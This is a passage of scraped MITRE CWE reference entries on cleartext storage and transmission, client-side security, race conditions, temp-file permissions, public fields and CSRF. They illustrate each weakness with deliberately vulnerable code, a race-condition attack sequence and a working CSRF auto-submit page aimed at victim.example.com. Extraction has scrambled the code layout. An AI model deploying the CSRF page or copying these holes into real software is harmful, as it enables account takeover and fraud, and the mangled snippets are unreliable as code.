exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt stores a plaintext user account ID in a browser cookie. (bad code)
Example Language: Java
response.addCookie( new Cookie("userAccountID", acctID) );
Because the account ID is in plaintext, the user's account information is exposed if their computer is compromised by an attacker. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).
CWE-526: Cleartext Storage of Sensitive Information in an Environment Variable
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
Information stored in an environment variable can be accessible by other processes with the execution context, including child processes that dependencies are executed in, or serverless functions in cloud environments. An environment variable's contents can also be inserted into messages, headers, log files, or other outputs. Often these other dependencies have no need to use the environment variable in question. A weakness that discloses environment variables could expose this information.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-316: Cleartext Storage of Sensitive Information in Memory
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe sensitive memory might be saved to disk, stored in a core dump, or remain uncleared if the product crashes, or if the programmer does not properly clear the memory before freeing it. It could be argued that such problems are usually only exploitable by those with administrator privileges. However, swapping could cause the memory to be written to disk and leave it accessible to physical attack afterwards. Core dump files might have insecure permissions or be stored in archive files that are accessible to untrusted people. Or, uncleared sensitive memory might be inadvertently exposed to attackers due to another weakness. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This could be a resultant weakness, e.g. if the compiler removes code that was intended to wipe memory.
Terminology
Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).
CWE-319: Cleartext Transmission of Sensitive Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Hardware Design" (View-1194)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code attempts to establish a connection to a site to communicate sensitive information. (bad code)
Example Language: Java
try {
URL u = new URL("http://www.secret.example.org/"); }HttpURLConnection hu = (HttpURLConnection) u.openConnection(); hu.setRequestMethod("PUT"); hu.connect(); OutputStream os = hu.getOutputStream(); hu.disconnect(); catch (IOException e) {
//...
}Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors. Example 2 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors used cleartext transmission of sensitive information in their OT products. Example 3 A TAP accessible register is read/written by a JTAG based tool, for internal use by authorized users. However, an adversary can connect a probing device and collect the values from the unencrypted channel connecting the JTAG interface to the authorized user, if no additional protections are employed. Example 4 The following Azure CLI command lists the properties of a particular storage account: (informative)
Example Language: Shell
az storage account show -g {ResourceGroupName} -n {StorageAccountName}
The JSON result might be: (bad code)
Example Language: JSON
{
"name": "{StorageAccountName}",
}
"enableHttpsTrafficOnly": false, "type": "Microsoft.Storage/storageAccounts" The enableHttpsTrafficOnly value is set to false, because the default setting for Secure transfer is set to Disabled. This allows cloud storage resources to successfully connect and transfer data without the use of encryption (e.g., HTTP, SMB 2.1, SMB 3.0, etc.). Azure's storage accounts can be configured to only accept requests from secure connections made over HTTPS. The secure transfer setting can be enabled using Azure's Portal (GUI) or programmatically by setting the enableHttpsTrafficOnly property to True on the storage account, such as: (good code)
Example Language: Shell
az storage account update -g {ResourceGroupName} -n {StorageAccountName} --https-only true
The change can be confirmed from the result by verifying that the enableHttpsTrafficOnly value is true: (good code)
Example Language: JSON
{
"name": "{StorageAccountName}",
}
"enableHttpsTrafficOnly": true, "type": "Microsoft.Storage/storageAccounts"
Note: to enable secure transfer using Azure's Portal instead of the command line:
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
Applicable communication channels are not limited to software products. Applicable channels include hardware-specific technologies such as internal hardware networks and external debug channels, supporting remote JTAG debugging. When mitigations are not applied to combat adversaries within the product's threat model, this weakness significantly lowers the difficulty of exploitation by such adversaries.
CWE-602: Client-Side Enforcement of Server-Side Security
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.
When the server relies on protection mechanisms placed on the client side, an attacker can modify the client-side behavior to bypass the protection mechanisms, resulting in potentially unexpected interactions between the client and server. The consequences will vary, depending on what the mechanisms are trying to protect.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example contains client-side code that checks if the user authenticated successfully before sending a command. The server-side code performs the authentication in one step, and executes the command in a separate step. CLIENT-SIDE (client.pl) (good code)
Example Language: Perl
$server = "server.example.com";
$username = AskForUserName(); $password = AskForPassword(); $address = AskForAddress(); $sock = OpenSocket($server, 1234); writeSocket($sock, "AUTH $username $password\n"); $resp = readSocket($sock); if ($resp eq "success") { # username/pass is valid, go ahead and update the info! writeSocket($sock, "CHANGE-ADDRESS $username $address\n"; else { print "ERROR: Invalid Authentication!\n"; }SERVER-SIDE (server.pl): (bad code)
Example Language: Perl
$sock = acceptSocket(1234);
($cmd, $args) = ParseClientRequest($sock); if ($cmd eq "AUTH") { ($username, $pass) = split(/\s+/, $args, 2);
$result = AuthenticateUser($username, $pass); writeSocket($sock, "$result\n"); # does not close the socket on failure; assumes the # user will try again elsif ($cmd eq "CHANGE-ADDRESS") { if (validateAddress($args)) { }$res = UpdateDatabaseRecord($username, "address", $args); }writeSocket($sock, "SUCCESS\n"); else { writeSocket($sock, "FAILURE -- address is malformed\n"); }The server accepts 2 commands, "AUTH" which authenticates the user, and "CHANGE-ADDRESS" which updates the address field for the username. The client performs the authentication and only sends a CHANGE-ADDRESS for that user if the authentication succeeds. Because the client has already performed the authentication, the server assumes that the username in the CHANGE-ADDRESS is the same as the authenticated user. An attacker could modify the client by removing the code that sends the "AUTH" command and simply executing the CHANGE-ADDRESS. Example 2 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors used client-side authentication in their OT products. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA race condition occurs within concurrent environments, and it is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc. A race condition violates these properties, which are closely related:
A race condition exists when an "interfering code sequence" can still access the shared resource, violating exclusivity. The interfering code sequence could be "trusted" or "untrusted." A trusted interfering code sequence occurs within the product; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable product. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account. (bad code)
Example Language: Perl
$transfer_amount = GetTransferAmount();
$balance = GetBalanceFromDatabase(); if ($transfer_amount < 0) { FatalError("Bad Transfer Amount"); }$newbalance = $balance - $transfer_amount; if (($balance - $transfer_amount) < 0) { FatalError("Insufficient Funds"); }SendNewBalanceToDatabase($newbalance); NotifyUser("Transfer of $transfer_amount succeeded."); NotifyUser("New balance: $newbalance"); A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase(). Suppose the balance is initially 100.00. An attack could be constructed as follows: (attack code)
Example Language: Other
In the following pseudocode, the attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.
CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2. CALLER-1 makes a transfer request of 80.00. PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00 PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase(). Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay. CALLER-2 makes a transfer request of 1.00. PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet. PROGRAM-2 determines the new balance as 99.00. After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00. PROGRAM-2 sends a request to update the database, setting the balance to 99.00 At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database. To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase(). Example 2 The following function attempts to acquire a lock in order to perform operations on a shared resource. (bad code)
Example Language: C
void f(pthread_mutex_t *mutex) {
pthread_mutex_lock(mutex);
/* access shared resource */ pthread_mutex_unlock(mutex); However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. (good code)
Example Language: C
int f(pthread_mutex_t *mutex) {
int result;
result = pthread_mutex_lock(mutex); if (0 != result) return result;
/* access shared resource */ return pthread_mutex_unlock(mutex); Example 3 Suppose a processor's Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of "accessible" memory. Any time this accessible range changes (as per the processor's boot status), the main MMU sends an update message to all the shadow MMUs. Suppose the interconnect fabric does not prioritize such "update" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
Race conditions in web applications are under-studied and probably under-reported. However, in 2008 there has been growing interest in this area.
Research Gap
Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check.
Research Gap
From a classification/taxonomy perspective, the relationships between concurrency and program state need closer investigation and may be useful in organizing related issues.
Maintenance
The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention.
CWE CATEGORY: Configuration
Weaknesses in this category are typically introduced during the configuration of the software.
Maintenance
Further discussion about this category was held over the CWE Research mailing list in early 2020. No definitive action has been decided.
Maintenance
This entry is a Category, but various sources map to it anyway, despite CWE guidance that Categories should not be mapped. In this case, there are no clear CWE Weaknesses that can be utilized. "Inappropriate Configuration" sounds more like a Weakness in CWE's style, but it still does not indicate actual behavior of the product. Further research is still required, however, as a "configuration weakness" might be Primary to many other CWEs, i.e., it might be better described in terms of chaining relationships.
CWE-379: Creation of Temporary File in Directory with Insecure Permissions
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file.
On some operating systems, the fact that the temporary file exists may be apparent to any user with sufficient privileges to access that directory. Since the file is visible, the application that is using the temporary file could be known. If one has access to list the processes on the system, the attacker has gained information about what the user is doing at that time. By correlating this with the applications the user is running, an attacker could potentially discover what a user's actions are. From this, higher levels of security could be breached.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following code examples a temporary file is created and written to. After using the temporary file, the file is closed and deleted from the file system. (bad code)
Example Language: C
FILE *stream;
if( (stream = tmpfile()) == NULL ) { perror("Could not open new temporary file\n"); return (-1); // write data to tmp file ... // remove tmp file rmtmp(); However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file. (bad code)
Example Language: Java
try {
File temp = File.createTempFile("pattern", ".suffix"); }temp.deleteOnExit(); BufferedWriter out = new BufferedWriter(new FileWriter(temp)); out.write("aString"); out.close(); catch (IOException e) { } Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users. Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually "/tmp" or "/var/tmp" and on Windows systems the default directory is usually "C:\\Windows\\Temp", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-493: Critical Public Variable Without Final Modifier
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.
If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor. (bad code)
Example Language: Java
public final class WidgetData extends Applet {
public float price; }... public WidgetData(...) { this.price = LookupPrice("MyWidgetType"); }The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData. Example 2 Assume the following code is intended to provide the location of a configuration file that controls execution of the application. (bad code)
Example Language: C++
public string configPath = "/etc/application/config.dat";
(bad code)
Example Language: Java
public String configPath = new String("/etc/application/config.dat");
While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-352: Cross-Site Request Forgery (CSRF)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user's web browser in which a valid session already exists. The following HTML is intended to allow a user to update a profile. (bad code)
Example Language: HTML
<form action="/url/profile.php" method="post">
<input type="text" name="firstname"/> <input type="text" name="lastname"/> <br/> <input type="text" name="email"/> <input type="submit" name="submit" value="Update"/> </form> profile.php contains the following code. (bad code)
Example Language: PHP
// initiate the session in order to validate sessions
session_start(); //if the session is registered to a valid user then allow update if (! session_is_registered("username")) { echo "invalid session detected!"; // Redirect user to login page [...] exit; // The user session is valid, so process the request // and update the information update_profile(); function update_profile { // read in the data from $POST and send an update // to the database SendUpdateToDatabase($_SESSION['username'], $_POST['email']); [...] echo "Your profile has been successfully updated."; This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images. The attacker can then host code that will silently change the username and email address of any user that visits the page while remaining logged in to the target web application. The code might be an innocent-looking web page such as: (attack code)
Example Language: HTML
<SCRIPT>
function SendAttack () { form.email = "attacker@example.com"; }// send to profile.php form.submit(); </SCRIPT> <BODY onload="javascript:SendAttack();"> <form action="http://victim.example.com/profile.php" id="form" method="post"> <input type="hidden" name="firstname" value="Funny"> <input type="hidden" name="lastname" value="Joke"> <br/> <input type="hidden" name="email"> </form> Notice how the form contains hidden fields, so when it is loaded into the browser, the user will not notice it. Because SendAttack() is defined in the body's onload attribute, it will be automatically called when the victim loads the web page. Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker's own address. At this stage, the user's identity has been compromised, and messages sent through this profile could be sent to the attacker's address. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user's profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause. Theoretical The CSRF topology is multi-channel:
CWE-396: Declaration of Catch for Generic Exception
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
